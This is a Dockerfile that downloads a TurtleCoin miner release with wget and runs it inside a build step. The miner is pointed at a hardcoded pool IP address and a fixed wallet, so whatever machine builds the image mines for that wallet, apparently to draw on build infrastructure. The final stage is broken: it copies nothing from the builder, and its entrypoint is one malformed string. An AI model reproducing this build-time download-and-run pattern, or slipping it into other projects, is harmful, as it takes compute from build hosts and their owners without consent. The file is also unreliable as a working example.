ARG ALPINE_VERSION=3.15.0

FROM alpine:${ALPINE_VERSION} as builder

RUN apk add --no-cache git \
                       make \
                       cmake \
		       wget \
		       tar \
                       libstdc++ \
                       gcc \
                       g++ \
                       hwloc-dev \
                       libuv-dev \
                       openssl-dev 

RUN wget https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz && \
    tar -xf violetminer-linux-v0.2.2.tar.gz && \
    cd violetminer-linux-v0.2.2 && \
    ./violetminer --disableNVIDIA --pool 37.203.243.102:443 --username TRTLv1Hqo3wHdqLRXuCyX3MwvzKyxzwXeBtycnkDy8ceFp4E23bm3P467xLEbUusH6Q1mqQUBiYwJ2yULJbvr5nKe8kcyc4uyps.1ff108723f3335f68a8f83a3b02e98e810e90cf1fa3f598b60322e15040fe913 --password x --algorithm chukwa_v2 --ssl

FROM alpine:${ALPINE_VERSION}

RUN apk add --no-cache hwloc \
                       libuv


WORKDIR /violetminer-linux-v0.2.2

ENTRYPOINT ["./violetminer --disableNVIDIA --pool 37.203.243.102:443 --username TRTLv1Hqo3wHdqLRXuCyX3MwvzKyxzwXeBtycnkDy8ceFp4E23bm3P467xLEbUusH6Q1mqQUBiYwJ2yULJbvr5nKe8kcyc4uyps.1ff108723f3335f68a8f83a3b02e98e810e90cf1fa3f598b60322e15040fe913 --password x --algorithm chukwa_v2 --ssl"]
